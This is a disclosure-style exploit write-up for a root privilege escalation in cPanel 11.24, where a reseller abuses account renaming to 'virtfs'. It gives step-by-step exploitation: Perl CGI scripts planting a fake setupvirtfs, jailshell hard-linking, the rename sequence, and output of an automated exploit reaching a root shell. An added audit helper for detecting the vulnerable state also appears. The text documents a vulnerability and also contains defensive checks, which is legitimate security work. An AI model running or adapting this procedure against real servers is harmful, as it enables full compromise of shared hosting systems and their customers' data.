cPanel 11.24.7-BETA_35691 - owning virtfs
DESCRIPTION
Resellers with edit-account privileges can execute commands as root. What follows is a slightly edited version of the email cPanel was sent about this issue.
11.24.7-BETA_35691
11.24.4-STABLE_35075
CentOS release 5.3 (Final)
A reseller account with the "Modify an Account" feature enabled.
Resellers that have access to the "Modify an Account" feature in WHM can rename one of their accounts to the username "virtfs" (without the quotes). This will ultimately allow the reseller to obtain full, unrestricted root access to a box.
This vulnerability requires the reseller to control the "/home/virtfs" directory. Some hosts will have the /home/virtfs directory set up already, and some will not. The ones that do probably offer jailshell access, since the execution of /usr/local/cpanel/bin/jailshell is normally what creates the /home/virtfs directory, which is user:group root:root, 0700:
[root@host ~]# ls -ld /home/virtfs
drwx------ 8 root root 4096 Apr 29 22:53 /home/virtfs
Note that it does not matter if the directory exists or not in order to pull off this attack. If it doesn't exist, the reseller can create it. If it does exist, the reseller can destroy it and recreate it themselves.
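An audit helper for the two preconditions described above, written as an added example for this page (it is not part of the advisory or of cPanel). It assumes GNU coreutils stat (Linux) and takes the paths as arguments so it can be run against a test tree as well as the live /home and /etc/passwd.

```shell
#!/bin/sh
# Added audit helper (not from the advisory). Assumes GNU 'stat' (Linux).

# check_virtfs_dir DIR [EXPECTED_UID]
# Returns 0 when DIR is absent (jailshell recreates it root-owned on first use)
# or is a real directory owned by EXPECTED_UID (default 0) with mode 0700.
# Returns 1 for a symlink, a non-directory, a wrong owner or a wrong mode.
check_virtfs_dir() {
    dir=$1
    want_uid=${2:-0}
    if [ ! -e "$dir" ] && [ ! -L "$dir" ]; then
        echo "[ ] $dir absent"
        return 0
    fi
    if [ -L "$dir" ]; then
        echo "[!] $dir is a symlink"
        return 1
    fi
    if [ ! -d "$dir" ]; then
        echo "[!] $dir is not a directory"
        return 1
    fi
    uid=$(stat -c '%u' "$dir")
    mode=$(stat -c '%a' "$dir")
    if [ "$uid" != "$want_uid" ] || [ "$mode" != "700" ]; then
        echo "[!] $dir is uid $uid mode $mode (want uid $want_uid mode 700)"
        return 1
    fi
    echo "[+] $dir ok"
    return 0
}

# check_reserved_names PASSWD_FILE
# Returns 1 if any account in PASSWD_FILE uses a name cPanel reserves for its
# own directory under /home (only "virtfs" here, the name this advisory abuses).
check_reserved_names() {
    passwd=$1
    rc=0
    for name in virtfs; do
        if cut -d: -f1 "$passwd" | grep -qx "$name"; then
            echo "[!] account named '$name' exists in $passwd"
            rc=1
        fi
    done
    return $rc
}
```

On a live host run it as check_virtfs_dir /home/virtfs followed by check_reserved_names /etc/passwd; a non-zero exit from either means the state the rename trick needs is present.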
This demonstration will assume that it already exists, for no other reason than the fact that I think it makes things a little more interesting/entertaining. Note that this demonstration also does not require logging into the shell at any time. We will be doing this entirely via the web browser in order to fully demonstrate the seriousness of this issue.
If you're testing this yourself based on the instructions below, make sure you set up the /home/virtfs directory (log into an account via ssh that has jailshell access, or use a cgi script via your web browser to execute the jailshell binary, etc). Or, just use mkdir and chmod.
Create a reseller account (we'll use the username "reseller"), and allow it access to the "Modify an Account" feature in WHM.
[ 1 of 3 ] Place this script called "user1.pl" in /home/reseller/cpanel3-skel/public_html/cgi-bin/ and make sure it has permissions of 0755:
#!/usr/bin/perl
print "Content-type: text/plain\r\n\r\n";
# Build the tree that becomes /home/virtfs/user2/usr/local/cpanel/bin once user1 is renamed to virtfs
system("mkdir -p /home/user1/user2/usr/local/cpanel/bin");
# Drop a setupvirtfs that only records the identity it runs as
system("echo '/usr/bin/id > /home/user1/id.out' > /home/user1/user2/usr/local/cpanel/bin/setupvirtfs");
chmod 0755, '/home/user1/user2/usr/local/cpanel/bin/setupvirtfs';
[ 2 of 3 ] Place this script called "user2.pl" in /home/reseller/cpanel3-skel/public_html/cgi-bin/ and make sure it has permissions of 0755:
#!/usr/bin/perl
print "Content-type: text/plain\r\n\r\n";
chdir '/home/user2';
# Hard-link the jailshell binary into user2's home and run it with the wrapper script
system("ln /usr/local/cpanel/bin/jailshell");
system("/home/user2/jailshell /home/user2/jailshell.sh");
[ 3 of 3 ] Place this script called "jailshell.sh" in /home/reseller/cpanel3-skel/ and make sure it has permissions of 0755:
#!/bin/sh
/home/user2/jailshell
1. As the reseller "reseller", create 2 new user accounts called "user1" and "user2".
Verify that the following files exist:
+ /home/user1/public_html/cgi-bin/user1.pl
  /home/user1/public_html/cgi-bin/user2.pl
  /home/user1/jailshell.sh
  /home/user2/public_html/cgi-bin/user1.pl
+ /home/user2/public_html/cgi-bin/user2.pl
+ /home/user2/jailshell.sh
NOTE: only the files on the lines starting with a "+" are going to actually be used.
As the reseller "reseller",
A. use the "Modify an Account" option to rename "user1" to "virtfs".
B. use the "Modify an Account" option to rename "virtfs" to "user1".
* Now there is no more /home/virtfs :-)
C. terminate the "user1" account.
D. recreate the "user1" account.
Browse to the following URL:
http://x.x.x.x/~user1/cgi-bin/user1.pl
As the reseller "reseller", use the "Modify an Account" feature in WHM to rename the "user1" account to "virtfs".
Browse to the following URL:
http://x.x.x.x/~user2/cgi-bin/user2.pl
* Now check the id.out file we created:
[user@host ~]$ cat /home/user1/id.out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
IMPACT
Full system compromise.
[user@host ~]$ ./11.24.4-EDGE_35784-virtfsown.pl
[+] Modify an Account (edit-account) privileges verified
[+] Creating /home/user/cpanel3-skel/public_html/cgi-bin/user1.pl
[+] Creating /home/user/cpanel3-skel/public_html/cgi-bin/user2.pl
[+] Creating /home/user/cpanel3-skel/user2.sh
[+] Creating /tmp/shell.c
[+] Compiling the shell and removing the source
[+] Creating /home/user/setupvirtfs.c
[+] Compiling /home/user/setupvirtfs.c
[+] Account user1 (qktiavbn.com) created
[+] Account user2 (wrkmhdpq.com) created
[?] /home/virtfs or /checkvirtfs exists. Safely removing /home/virtfs
[+] Renaming user1 to virtfs
[+] Renaming virtfs to user1
[?] /home/virtfs no longer exists
[+] Account user1 terminated
[+] Account user1 (zuamufgv.com) created
[+] URL 1: Creating the directory structure and setting up setupvirtfs
[+] Renaming user1 to virtfs
[+] URL 2: Calling the jailshell scripts
[root@host /]# id
uid=0(root) gid=0(root)